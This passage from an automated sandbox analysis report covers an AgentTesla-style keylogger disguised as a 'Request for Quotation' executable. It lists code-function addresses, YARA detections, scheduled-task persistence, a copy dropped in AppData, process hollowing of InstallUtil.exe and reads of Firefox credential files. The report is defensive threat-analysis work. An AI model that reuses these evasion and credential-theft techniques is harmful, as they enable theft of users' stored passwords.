                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_0637D8000_2_0637D800
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_063728A00_2_063728A0
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_063766B80_2_063766B8
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_0637BEF10_2_0637BEF1
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_0637F7930_2_0637F793
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_0637D7F00_2_0637D7F0
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_0637C5F80_2_0637C5F8
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_0637E1280_2_0637E128
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_063791D10_2_063791D1
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_0639907B0_2_0639907B
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_06398CBD0_2_06398CBD
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_0639CB310_2_0639CB31
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_0639003A0_2_0639003A
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_063900400_2_06390040
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_0639E1480_2_0639E148
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_0639CE670_2_0639CE67
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_063999380_2_06399938
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_063999480_2_06399948
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_063A44380_2_063A4438
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_063A3EB00_2_063A3EB0
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_063A3EA00_2_063A3EA0
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_063CECA00_2_063CECA0
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_063C1CF00_2_063C1CF0
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_063C472D0_2_063C472D
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_063C4C6A0_2_063C4C6A
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_063CEC900_2_063CEC90
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_063C1CE10_2_063C1CE1
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_063CB5400_2_063CB540
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_063C8AF80_2_063C8AF8
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_063C3B600_2_063C3B60
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_063C486A0_2_063C486A
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_063C89E00_2_063C89E0
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_063C31E10_2_063C31E1
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_063C89D60_2_063C89D6
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_064100400_2_06410040
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_064100060_2_06410006
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_0668D9F00_2_0668D9F0
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_066700400_2_06670040
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_066700060_2_06670006
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_0668CD500_2_0668CD50
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_02754A602_2_02754A60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_02753E482_2_02753E48
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0275CF282_2_0275CF28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_02759C682_2_02759C68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_027541902_2_02754190
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05F156B02_2_05F156B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05F100402_2_05F10040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05F1BCC82_2_05F1BCC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05F13F282_2_05F13F28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05F1DBF82_2_05F1DBF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05F18B5B2_2_05F18B5B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05F12AE82_2_05F12AE8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05F1321B2_2_05F1321B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05F14FD02_2_05F14FD0
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_0281CEE44_2_0281CEE4
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_063502884_2_06350288
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_063DBF584_2_063DBF58
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_063D142C4_2_063D142C
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_063DCC084_2_063DCC08
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_063D00404_2_063D0040
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_063D464E4_2_063D464E
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_063DBF494_2_063DBF49
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_063DB7A84_2_063DB7A8
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_063DB7984_2_063DB798
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_063D5FF04_2_063D5FF0
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_063D5FE04_2_063D5FE0
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_063DCBF84_2_063DCBF8
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_063D00064_2_063D0006
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_0651BF004_2_0651BF00
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_0651D8004_2_0651D800
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_0651BEF14_2_0651BEF1
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_065166B84_2_065166B8
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_0651D7F04_2_0651D7F0
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_0653907B4_2_0653907B
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_06538CBD4_2_06538CBD
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_0653CB3E4_2_0653CB3E
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_065300404_2_06530040
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_065300064_2_06530006
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_0653E1484_2_0653E148
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_0653CE674_2_0653CE67
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_065399484_2_06539948
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_065399384_2_06539938
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_06561CF04_2_06561CF0
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_06561CE14_2_06561CE1
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_06568AF84_2_06568AF8
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_065689D64_2_065689D6
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_065689E04_2_065689E0
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_065836784_2_06583678
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_065836684_2_06583668
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_065BFB084_2_065BFB08
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_065B00404_2_065B0040
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_065B00064_2_065B0006
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_0682D9F04_2_0682D9F0
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_068100074_2_06810007
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_068100404_2_06810040
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_0682CD504_2_0682CD50
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_063502774_2_06350277
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_00F24A605_2_00F24A60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_00F29C635_2_00F29C63
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_00F23E485_2_00F23E48
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_00F2CF285_2_00F2CF28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_00F241905_2_00F24190
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_013CCEE46_2_013CCEE4
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_0682BF586_2_0682BF58
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_0682142C6_2_0682142C
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_0682CBF86_2_0682CBF8
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_068200406_2_06820040
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_0682462D6_2_0682462D
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_0682463D6_2_0682463D
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_0682B7A36_2_0682B7A3
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_0682B7A86_2_0682B7A8
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_06825FE06_2_06825FE0
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_06825FF06_2_06825FF0
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_0682BF496_2_0682BF49
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_0682CC096_2_0682CC09
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_068200076_2_06820007
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_0696BF006_2_0696BF00
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_069665D06_2_069665D0
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_0696D8006_2_0696D800
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_0696BEF16_2_0696BEF1
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_0696D7F06_2_0696D7F0
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_0698907B6_2_0698907B
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_06988CBD6_2_06988CBD
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_0698CB406_2_0698CB40
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_0698001A6_2_0698001A
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_069800406_2_06980040
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_0698E1486_2_0698E148
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_0698CE676_2_0698CE67
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_069899386_2_06989938
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_069899486_2_06989948
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_069B1CF06_2_069B1CF0
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_069B1CE16_2_069B1CE1
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_069B8AF86_2_069B8AF8
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_069B89D76_2_069B89D7
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_069B89E06_2_069B89E0
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_069D36D06_2_069D36D0
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_069D36C06_2_069D36C0
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_06A0FB086_2_06A0FB08
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_06A000066_2_06A00006
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_06A000406_2_06A00040
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_06C7D9F06_2_06C7D9F0
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_06C600406_2_06C60040
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_06C600076_2_06C60007
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_06C7CD506_2_06C7CD50
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_024693F87_2_024693F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_02464A607_2_02464A60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_02463E487_2_02463E48
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0246CF287_2_0246CF28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_02469C707_2_02469C70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_024641907_2_02464190
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_05B856A87_2_05B856A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_05B800407_2_05B80040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_05B8BCC07_2_05B8BCC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_05B8DC007_2_05B8DC00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_05B83F207_2_05B83F20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_05B82EE87_2_05B82EE8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_05B88B607_2_05B88B60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_05B89A987_2_05B89A98
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_05B836307_2_05B83630
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_05B84FC87_2_05B84FC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_02469C687_2_02469C68
                    Source: Request for Quotation-537262227-04.exe, 00000000.00000002.2156575448.000000000298A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Request for Quotation-537262227-04.exe
                    Source: Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.000000000392A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7dfcfdf2-d881-49c9-a39e-708aca656f85.exe4 vs Request for Quotation-537262227-04.exe
                    Source: Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.00000000037C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Request for Quotation-537262227-04.exe
                    Source: Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.00000000037C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEqapgjjp.exe2 vs Request for Quotation-537262227-04.exe
                    Source: Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.00000000037C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGodrazgi.dll" vs Request for Quotation-537262227-04.exe
                    Source: Request for Quotation-537262227-04.exe, 00000000.00000002.2154832609.0000000000A1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Request for Quotation-537262227-04.exe
                    Source: Request for Quotation-537262227-04.exe, 00000000.00000000.2098732667.00000000003F8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameEqapgjjp.exe2 vs Request for Quotation-537262227-04.exe
                    Source: Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.00000000039C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Request for Quotation-537262227-04.exe
                    Source: Request for Quotation-537262227-04.exe, 00000000.00000002.2176585974.00000000061E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Request for Quotation-537262227-04.exe
                    Source: Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.0000000003A76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGodrazgi.dll" vs Request for Quotation-537262227-04.exe
                    Source: Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.0000000003A76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Request for Quotation-537262227-04.exe
                    Source: Request for Quotation-537262227-04.exe, 00000000.00000002.2176071421.00000000060A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameGodrazgi.dll" vs Request for Quotation-537262227-04.exe
                    Source: Request for Quotation-537262227-04.exe, 00000000.00000002.2156575448.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Request for Quotation-537262227-04.exe
                    Source: Request for Quotation-537262227-04.exe, 00000000.00000002.2156575448.0000000002A3F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7dfcfdf2-d881-49c9-a39e-708aca656f85.exe4 vs Request for Quotation-537262227-04.exe
                    Source: Request for Quotation-537262227-04.exe, 00000000.00000002.2177410373.0000000006430000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Request for Quotation-537262227-04.exe
                    Source: Request for Quotation-537262227-04.exe, 00000000.00000002.2175534313.0000000005D95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEqapgjjp.exe2 vs Request for Quotation-537262227-04.exe
                    Source: Request for Quotation-537262227-04.exeBinary or memory string: OriginalFilenameEqapgjjp.exe2 vs Request for Quotation-537262227-04.exe
                    Source: Request for Quotation-537262227-04.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 4.2.Oltpxw.exe.3b97470.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 4.2.Oltpxw.exe.3b97470.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.Request for Quotation-537262227-04.exe.392a7d0.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Request for Quotation-537262227-04.exe.392a7d0.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 4.2.Oltpxw.exe.3b97470.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 4.2.Oltpxw.exe.3b97470.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.Request for Quotation-537262227-04.exe.392a7d0.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Request for Quotation-537262227-04.exe.392a7d0.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: Request for Quotation-537262227-04.exe, Mwzfs.csCryptographic APIs: 'CreateDecryptor'
                    Source: Oltpxw.exe.0.dr, Mwzfs.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.Request for Quotation-537262227-04.exe.6430000.11.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 0.2.Request for Quotation-537262227-04.exe.6430000.11.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 0.2.Request for Quotation-537262227-04.exe.6430000.11.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                    Source: 0.2.Request for Quotation-537262227-04.exe.6430000.11.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                    Source: 0.2.Request for Quotation-537262227-04.exe.6430000.11.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.Request for Quotation-537262227-04.exe.6430000.11.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.Request for Quotation-537262227-04.exe.6430000.11.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 0.2.Request for Quotation-537262227-04.exe.6430000.11.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.Request for Quotation-537262227-04.exe.6430000.11.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 0.2.Request for Quotation-537262227-04.exe.6430000.11.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/2@2/2
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeFile created: C:\Users\user\AppData\Roaming\Oltpxw.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                    Source: Request for Quotation-537262227-04.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Request for Quotation-537262227-04.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: Request for Quotation-537262227-04.exeReversingLabs: Detection: 18%
                    Source: Request for Quotation-537262227-04.exeVirustotal: Detection: 13%
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeFile read: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\Request for Quotation-537262227-04.exe "C:\Users\user\Desktop\Request for Quotation-537262227-04.exe"
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Oltpxw.exe "C:\Users\user\AppData\Roaming\Oltpxw.exe"
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Oltpxw.exe "C:\Users\user\AppData\Roaming\Oltpxw.exe"
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
